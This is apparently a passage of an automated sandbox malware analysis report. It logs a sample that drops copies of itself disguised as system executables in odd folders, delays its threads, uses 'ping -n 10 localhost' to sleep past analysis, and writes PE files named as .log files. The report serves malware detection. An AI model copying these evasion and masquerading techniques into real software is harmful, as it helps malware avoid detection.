Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Memory allocated: DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Memory allocated: 1ABF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Memory allocated: 1150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Memory allocated: 13B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Memory allocated: 2450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Memory allocated: 1A510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: 1AA70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: 1070000 memory reserve \| memory write watch
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: 1ACF0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Memory allocated: 1680000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Memory allocated: 1B1F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Memory allocated: 1790000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Memory allocated: 1B190000 memory reserve \| memory write watch
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Memory allocated: D50000 memory reserve \| memory write watch
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Memory allocated: 1AAA0000 memory reserve \| memory write watch
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Memory allocated: F70000 memory reserve \| memory write watch
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Memory allocated: 1A900000 memory reserve \| memory write watch
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: 1770000 memory reserve \| memory write watch
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: 1B140000 memory reserve \| memory write watch
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: BC0000 memory reserve \| memory write watch
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Memory allocated: 1A700000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zjWVMLxf.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ViwkdMoR.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nHnXqlGz.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ECoURVov.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xpHnaOLh.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kvKyGzpq.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fRPzNptz.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AxEwwgFd.log	Jump to dropped file

Source: C:\Users\user\Desktop\F3ePjP272h.exe TID: 3424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe TID: 3792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe TID: 5596	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe TID: 5464	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe TID: 6844	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe TID: 1788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe TID: 6048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe TID: 2464	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe TID: 3376	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Speech\Engines\SR\Idle.exe TID: 3724	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Speech\Engines\SR\Idle.exe TID: 1784	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\PING.EXE

Last function: Thread delayed

Source: C:\Users\user\Desktop\F3ePjP272h.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Thread delayed: delay time: 922337203685477
